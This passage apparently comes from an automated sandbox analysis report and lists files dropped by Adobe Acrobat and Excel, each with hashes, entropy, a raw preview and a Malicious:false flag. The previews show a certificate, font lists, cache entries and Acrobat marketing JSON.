                            SSDEEP:6:7rXeVq2P92nKuAl9OmbzNMxIFUt8OrJZmw+OrpFkwO92nKuAl9OmbzNMFLJ:7ruVv4HAa8jFUt8OrJ/+Or35LHAa84J
                            MD5:B2B4478A32B0BE754F581D9B37997CF6
                            SHA1:1B9158F8CCE258AB1D84600DC003BFAAC19C75C4
                            SHA-256:CA6FF299BA5AE7B2DE8790B9CE87397ADC41437943B9C7247B0C726A9793627E
                            SHA-512:5C8790C9FBEA6630AC25C7A75131D5B8CD2FC88BE4DAC00CEC6668E06E32BB7D7E4AD8DA31BF2A6D6B7A20C004F6C51730AAC2D0292B176A7D7B6A5B5E716BBE
                            Malicious:false
                            Preview:2024/12/10-00:48:41.066 1b90 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/10-00:48:41.071 1b90 Recovering log #3.2024/12/10-00:48:41.075 1b90 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:Certificate, Version=3
                            Category:dropped
                            Size (bytes):1391
                            Entropy (8bit):7.705940075877404
                            Encrypted:false
                            SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                            MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                            SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                            SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                            SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                            Malicious:false
                            Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                            Category:dropped
                            Size (bytes):4761
                            Entropy (8bit):7.945585251880973
                            Encrypted:false
                            SSDEEP:96:6ZUpZsm0HwZ8FLSeXs+aiL9qcZ7KtlAD1GlNHgdkVI5F11AcNmwkVFzGz6ENhZC7:62T0QOLl8vAqcZ7K3AUNAdx5FAx9VEOj
                            MD5:77B20B5CD41BC6BB475CCA3F91AE6E3C
                            SHA1:9E98ACE72BD2AB931341427A856EF4CEA6FAF806
                            SHA-256:5511A9B9F9144ED7BDE4CCB074733B7C564D918D2A8B10D391AFC6BE5B3B1509
                            SHA-512:3537DA5E7F3ABA3DAFE6A86E9511ABA20B7A3D34F30AEA6CC11FEEF7768BD63C0C85679C49E99C3291BD1B552DED2C6973B6C2F7F6D731BCFACECAB218E72FD4
                            Malicious:false
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):192
                            Entropy (8bit):2.7569015731729736
                            Encrypted:false
                            SSDEEP:3:kkFkllX0MDtfllXlE/HT8k21NNX8RolJuRdxLlGB9lQRYwpDdt:kKRkeT8F7NMa8RdWBwRd
                            MD5:2E140CC808F7E24862B7135F6AB8879A
                            SHA1:CF332C43A0D68C3108E576DAA79536B407FC5507
                            SHA-256:43C67039436FC8DB8E08F697CC829E3AF46402486180F4B138E5497F170949B8
                            SHA-512:24CA87859857366EB24CA2A6E9194A696585FEA69FCAE9D09FC8AFD182FED36688F8C83338A3248648D65EFCEA523BF9896279BD6B9110E79FB78C58AE4C0462
                            Malicious:false
                            Preview:p...... ........V.I0.J..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):340
                            Entropy (8bit):3.262470744919491
                            Encrypted:false
                            SSDEEP:6:kKyC5+7DNfUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:MLkPlE99SCQl2DUeXJlOA
                            MD5:DE69FF90A7AD2EF1AC51F17AA0245DC2
                            SHA1:D010C91C0D83295A72516E66DB3B1430790DA56A
                            SHA-256:15CFB196B6C23069D896AEAAE101A16502F6979F210AEDB45C516E14A3F768AA
                            SHA-512:09B420BD2F48720F7BC863F737DC7CDEE75759A0090BF55F9426FBE9040AC1AD3AEC9C483DF05459D3A7A15F68D7E9F2F5537A0A1D833B0E48F2AA2BA1E19DF1
                            Malicious:false
                            Preview:p...... ........g.X..J..(....................................................... ........~..MG......&.....6.........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:PostScript document text
                            Category:dropped
                            Size (bytes):1233
                            Entropy (8bit):5.231764319122804
                            Encrypted:false
                            SSDEEP:24:kkOid8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:nkxPhtgNgx4pyZxakazxCIK2gxap
                            MD5:9A2F91583335D08C674325CD5BCD308D
                            SHA1:1CA6006B93ED4DB5BFFE4FC2DA01C4AD10D99D1F
                            SHA-256:4FAFB1DFB2D6F2BB2BFC97D6F3D770F9C0B50B30C3335BA3193E1B34D7F7887E
                            SHA-512:100CB6C784A589CC25A5207FA0AA3194D8D5D920C5D4387AF98A4561FAAF4C6084A51B97304D798CF1C363828670F234832421E528D501FF8E1E605BA3BA0E61
                            Malicious:false
                            Preview:%!Adobe-FontList 1.23.%Locale:0x80c..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:PostScript document text
                            Category:dropped
                            Size (bytes):10880
                            Entropy (8bit):5.214006841239478
                            Encrypted:false
                            SSDEEP:192:8gAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:8V548vvqvSvivzv4vkv1vkvKlsvVtfZp
                            MD5:57BD0790C91010ADF06F1B70F4F61828
                            SHA1:EC7FA144A1F48D5F9B0A4FCDC1088E5CB5C4E812
                            SHA-256:3006B1E391240D7955873134D96E215D1F9371A086E0825821CCEE3809103A1B
                            SHA-512:BE9FABC19986B9C2A0EA1AB3CD285FF18689F7F4B25E3D1F9F1B666358832361FA72CA8B92E9FEA7864F5227F5E6430DF9CE88435339477BBF96978CCB60BD98
                            Malicious:false
                            Preview:%!Adobe-FontList 1.23.%Locale:0x80c..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):227002
                            Entropy (8bit):3.392780893644728
                            Encrypted:false
                            SSDEEP:1536:WKPC4iyzDtrh1cK3XEivK7VK/3AYvYwgF/rRoL+sn:DPCaJ/3AYvYwglFoL+sn
                            MD5:87EDBEE38F56C20298F25D5D3D4D1B5C
                            SHA1:7F904E9615AC3186A87472EF366DD8202855B0B7
                            SHA-256:A46B56D3ABCC137D1872DDF20EED4BCD7D04518282282ADB32DDCCF70D7FFBA6
                            SHA-512:BBEBC1FCD5BC9AE042DD5782425BA8C47BF3EAC283B2487FC4E3FF6BF8101306DAB081E5135594165D4DC1AC120FF125AADBC5B3FFE7C646183C04DF77865E0D
                            Malicious:false
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):295
                            Entropy (8bit):5.366641262429402
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJM3g98kUwPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGMbLUkee9
                            MD5:8B3203DE5323059453EC58A4B9CA742C
                            SHA1:036CCA019865950BDF6681A3AB6AC77A25B450EA
                            SHA-256:4BB2997881813FE59F5F691946D1C7AF690A401577CC6E0F452F872BBE337E41
                            SHA-512:A123B17A69420D53F7B5CB5F62BD611ECBDDBAC7B0219AA015F38186F4DAA86C101827CD7EEE3D5D5A1839A607EAD5A304882D0DD850E1C88562008879B85E46
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):294
                            Entropy (8bit):5.309585962664248
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJfBoTfXpnrPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGWTfXcUkee9
                            MD5:69F1543223D9FB8EC5189C32F05F0794
                            SHA1:5ECDCBFB889400CBDCCDA5DFB3AFC31FC84B4F34
                            SHA-256:2DEE2AB42F2CF5266E4FAD5154A6354F36AB50542CCB71168FCC6F6A180E50C8
                            SHA-512:5DB52C4372622ACAC03E82374F8DA7B7597B746D3102623CEAC251D194BEBEFE0F4620517F9B0F01E4273EB09DA984ED0FABCE55E53610E202560CB4D44A1D02
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):294
                            Entropy (8bit):5.288783710633452
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJfBD2G6UpnrPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGR22cUkee9
                            MD5:82BB3A0CCAF6698644E8F9018357936F
                            SHA1:36CB95B4915C66A7C396D574F0AD55F1CCBDE395
                            SHA-256:8458A8D025E4F66FBF347726D53C93BF0E4C5A68C369DEA95A9D809E03992E52
                            SHA-512:F706F9C394BB9EEB1812044D0CEB28941CD6B74D97C1AE07BE6007C9549079AFD3A9B3624A326A59A82E99A44C41EAE4FE434D9B10D11CD4ECD559C6B966C946
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):285
                            Entropy (8bit):5.345649153280258
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJfPmwrPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGH56Ukee9
                            MD5:BD5817A743AE5E1E1A84C2404570DAAE
                            SHA1:C9FD92AA1E45AE5E25D0CB5D9EDD378CE50DC503
                            SHA-256:84A16D6AB08A8ADFF198D2875B74C50900B61978F8B6A3782A793B26BA2F2A83
                            SHA-512:73DA0C63D97E3D0113A1FEF7F4B980564EEE11EB3EAADA54DB0950DD4B1E7516C5733CEC5CD95568BAE347FB3DF6326D4B322317830D3A4F185DC2B3FE8FB93E
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):1123
                            Entropy (8bit):5.691366110756918
                            Encrypted:false
                            SSDEEP:24:Yv6Xoy6oV6iApLgE9cQx8LennAvzBvkn0RCmK8czOCCS2:Yv8pvAhgy6SAFv5Ah8cv/2
                            MD5:59A2E3DDE5BA5C44767E334A7B936959
                            SHA1:DAC3B5B6157A8A613A3BA605E8DBBED82511FFC5
                            SHA-256:1DE21726F20A47F4FCC14CE2257573BFE811956F92394BFAC6636A7E459A0C79
                            SHA-512:8400D0AEFB9987B0B6E0984728FCB1F3D06FF9C40087246825FEEFE5C9F4DA338498963EF318D953504D3084DAC1980CDAD88EA281E3AB1BEE4B1654D1150334
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):289
                            Entropy (8bit):5.292982321169806
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJf8dPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGU8Ukee9
                            MD5:6FCEDB439A9FB094384964105E5866F7
                            SHA1:56CBE65951F6AFB03DF0658BE0F41210BFEA28ED
                            SHA-256:38EAB648110C95C5A32B050CEE21F73D6081A50A80276E6BE5F35E2B374DC7D7
                            SHA-512:B8828E8B5C4B119C9AE08E5880EAF9B285B2184CC8F4C615B7BA1B9437C2C98FB8A02F84C1DA11786A8EA44DE68E27DF014F1A22275C0CFE1158FB3D4D4695CF
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):292
                            Entropy (8bit):5.293679995190487
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJfQ1rPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGY16Ukee9
                            MD5:AB4D0B18BC7044C5E8E0FA8AF7DDB689
                            SHA1:21CC63ED489793C7ABEDDBB508E9DBDBD0845AFD
                            SHA-256:8A57454321B213AF552BDDF4536502A8500592C18ABCEE60BE53D14F36141887
                            SHA-512:15EE817379562D9D847A2B380B98D76B75292959DAF40E6691589DF1A56317B4D57F1526E15D309DD4AB346413297903D53F4C6087CDC6A03593301D311FF3A5
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):289
                            Entropy (8bit):5.312443526229112
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJfFldPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGz8Ukee9
                            MD5:0DF446EE7425E757FA559BE6D05D84B8
                            SHA1:68C772C29DD4BBA9A31106D4B178C4C0266942A6
                            SHA-256:F1C2C56C61CFCBF1185A9449E28DB446C60CB25D89E16C2DEC4BAC82CA6D14F9
                            SHA-512:5A287B36617B43E7A26E9447764E97DD7A6062855362E8C65EC9863B45479699D08FD8DAB87F3792930ACE1672A4D451268C57E4CBBE5CFE97DFEBCCFDEA2D8B
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):295
                            Entropy (8bit):5.32013864814985
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJfzdPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGb8Ukee9
                            MD5:7BD384FE6D6A17578E7B88ED8B442988
                            SHA1:EF313345BAD6379BE9A71748CB3FBCEC551B37E5
                            SHA-256:9795F59492B59CF0E1A94D958E6BF93BC2F768DA1E56CD199D0EBF6C9905E4A7
                            SHA-512:9CF15F1768D17E9FBD8D936661B2CB253A05BFD78F5446DEA16903824E243916E2C8BC195596E0434032F5B301DB0DBB61561D3CFB94D712C561B63D0D1E9CE7
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):289
                            Entropy (8bit):5.300192458413344
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJfYdPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGg8Ukee9
                            MD5:A66CA753DF390BFB106DB10B37BEE662
                            SHA1:FFC27F833189FB7BE5D33F741B862056049D7C2F
                            SHA-256:59AE5E7C8E148A1AA65903F07DE812546DA9C3BF55D2E812AF67B3880A6C5511
                            SHA-512:703E15B4BFAF208197FD3840110CFDD0F37E03DAFFF28B5D254DE86965A18E536A58307EDA8BE61EFD48424B092730C4A46A3A6A9AE54F987DA8D9DFB1390945
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):284
                            Entropy (8bit):5.286246219588565
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJf+dPeUkwRe9:YvXKXomN6+9N7EY5YpW7LG28Ukee9
                            MD5:F162062A8B47E9B0B26AE2DDEED5DB7F
                            SHA1:1C35EA724F96ADD596BF61C0940B2D161E1EDE4F
                            SHA-256:11D7C887F59DA308EE3161BA8BD9900F43314D1208C845F2587E52EC9BCEE16D
                            SHA-512:E04522ADDF8703E00F47B9AC75612635CD10C5FF596B1DCFC02EAF847C3C9304C533B2B9425B2F2B85FA08269DB053599EDAC65804F8AB4BE0005B44E84FD53A
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):291
                            Entropy (8bit):5.283738233348972
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJfbPtdPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGDV8Ukee9
                            MD5:B6C3E3AB7542D410AB103D8683316F3D
                            SHA1:49671A560909B1372B14C7E7FB6FB64EC78AF953
                            SHA-256:23BD4A6C39CCB6C8CD6B6F7FE971EBEFD859D714A721628C36DCDE07FBBAA0AD
                            SHA-512:B6AF8AAF3804CD957DE0DBDC37296F5845906805E353214B3BCE6A14655B7A5CA2430D989B9BE173683B96EF7BFB58320461AF720A907EB11F09E3AD33623051
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):287
                            Entropy (8bit):5.284764366453812
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJf21rPeUkwRe9:YvXKXomN6+9N7EY5YpW7LG+16Ukee9
                            MD5:CFA772DE6FC3195D9142807EF0D3E209
                            SHA1:B9E5C1E3D09C669B26040D0898D0BA4F674D62E5
                            SHA-256:8E83173C0820AD263DBDD78C723EE4CB6D607B4E1EA0A181E46EDC56A3B00E6D
                            SHA-512:7EB60CDD29C9FF01692E1DFF742D4D3DA29798E1B4BC52FAA642D555F5AFE30EB62D1A055F681EDAED60F5E20285CFB071D3E50FC8CDC088E574FD442959E25E
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):1090
                            Entropy (8bit):5.665550660750966
                            Encrypted:false
                            SSDEEP:24:Yv6Xoy6oV6ikamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS2:Yv8pviBgkDMUJUAh8cvM2
                            MD5:B8E7DB87B57D0688DAD2B7A698CDA490
                            SHA1:C66756284D3BECFB8C6E4B37DC4D510C81BC62B1
                            SHA-256:544C64EB70E51188D65AA63B26D1C027ED82C5E1DD873C78BA6A4A096791E163
                            SHA-512:1C9A2EC9C7116655ABAA6161F426FCF0AB0E7EB917EF739ED3BD6DD2DAFAFCD504C256181A4AB9DFA5489048B1842B2ED66AB1B2D58A7B089DB6521C667600B3
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for 